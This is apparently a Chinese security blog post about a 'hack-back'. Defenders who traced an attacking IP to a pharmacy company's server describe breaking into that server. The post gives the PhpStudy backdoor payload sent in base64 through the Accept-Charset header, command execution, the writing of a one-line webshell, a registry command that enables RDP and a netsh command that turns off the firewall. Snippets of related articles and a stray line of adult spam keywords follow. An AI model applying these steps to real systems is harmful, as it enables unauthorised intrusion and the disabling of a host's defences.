<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰 | 防守方溯源紅隊跳板

    VSole2022-12-19 13:46:33

    通過監測設備發現一個攻擊IP,其資產為某藥房企業,疑似為紅隊跳板,經過溯源,最終確定為該IP為紅隊跳板,感覺本次溯源有不少收獲,且很有意思,因此將溯源過程記錄下來。

    1.首先訪問其官網,發現服務器返回信息顯示其使用了PHP/5.4.45,想到如果是利用PhpStudy工具,可能存在后門漏洞

    2.查看之前的博客《PhpStudy后門漏洞》,構造payload,將Accept-Charset字段修改為base64加密的命令“phpinfo();”

    3.根據結果看出確實存在PhpStudy解析漏洞,根據路徑猜測其為Windows操作系統,執行base64加密的命令“echo system("net user");”

    4.探測網站根目錄,執行base64加密的命令“echo system("dir");”

    5.下載安裝PhpStudy工具,發現網站根目錄都為www目錄

    猜測目標根目錄為“D:\phpStudy\WWW\”,創建文件寫入一句話木馬,base64加密“$fp=fopen('D:\phpStudy\WWW\index2.php',"w+");fputs($fp,'');fclose($fp);”

    6.用工具進行連接馬文件

    7.探測開放端口信息,未開啟3389端口

    8.創建隱藏用戶admin$發現已經被創建,可通過修改密碼,開啟3389端口,遠程登錄

    PS:動作太大,不推薦,創建新用戶后,遠程連接新賬號返回“遠程登錄時出現windows不能讓您遠程登錄,因為不能加載您的配置文件”,才使用這種方法

    開啟3389端口:

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    關閉防火墻(操作系統版本從PHPinfo截圖可知為Windows Server 2003):

    netsh firewall set opmode mode=disable

    9.遠程連接,確定為紅隊攻擊跳板

    base64跳板
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    通過監測設備發現一個攻擊IP,其資產為某藥房企業,疑似為紅隊跳板,經過溯源,最終確定為該IP為紅隊跳板,感覺本次溯源有不少收獲,且很有意思,因此將溯源過程記錄下來。
    在2021hw期間,通過監測設備發現一個攻擊IP,其資產為某藥房企業,疑似為紅隊跳板,經過溯源,最終確定為該IP為紅隊跳板,感覺本次溯源有不少收獲,且很有意思,因此將溯源過程記錄下來。
    一般在獲取靶機的初始shell后,會進行提權,可以先查看home目錄下的用戶,因為有可能需要這個用戶來做跳板去獲取root權限;然后可以查看有沒有sudo濫用,定時任務,suid文件,或者home目錄下另外一個用戶時宿主的文件等等,但是,往往有一個很容易被忽略,歷史命令的查看。
    Bleeping Computer 網站今日消息,烏克蘭計算機應急小組(CERT-UA)發布公告,警示部分攻擊者正在破壞 WordPress 網站,并注入惡意 JavaScript 代碼,對親烏克蘭網站和政府門戶網站進行 DDoS(分布式拒絕服務)攻擊。
    shiro打點獲取10段服務器權限,在10段機器出網且已上線cs;172段不出網且反向不通10段,已通過mysql弱口令獲取system權限,存在web服務。
    Webshell檢測方法
    2022-01-04 10:33:05
    Webshell作為一種web后門,通常由攻擊者通過常見的Web網站漏洞,如sql注入、文件包含和上傳等,上傳到服務器,從而為攻擊者提供與服務器端進行交互的能力。
    企業隔離網絡環境中的DNS存在常見錯誤配置,可能導致氣隙網絡及其保護的高價值資產面臨外部攻擊風險。安全驗證廠商Pentera的研究人員日前發布文章稱,在使用接入DNS服務器的氣隙網絡時,組織可能會無意間將資產暴露給惡意黑客,并導致嚴重的數據泄露。而UDP并不具備內置安全機制,因此攻擊者才能惡意利用DNS。DNS對所接收的字符類型有所限制,所以攻擊一方不可能隨意發送字符。
    之前在強網杯做過一道popmaster,在打SCTF又遇到這種類型的題目,簡單總結一下這類題目的思路和一些暴力取巧的做法。
    docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1. 如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等驗證碼與郵箱以及token的返回泄露,以及后臺為校驗從而可刪除的參數。從某個成功請求中捕獲數據包觀察cookie或者token是否存在規律或加密。token的key參數解密構建獲取真實user密鑰,可拼接、規律、時間戳……winodws桌面:TeamViewerQS單文件windows下載文件;certutil -urlcache -split -f?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类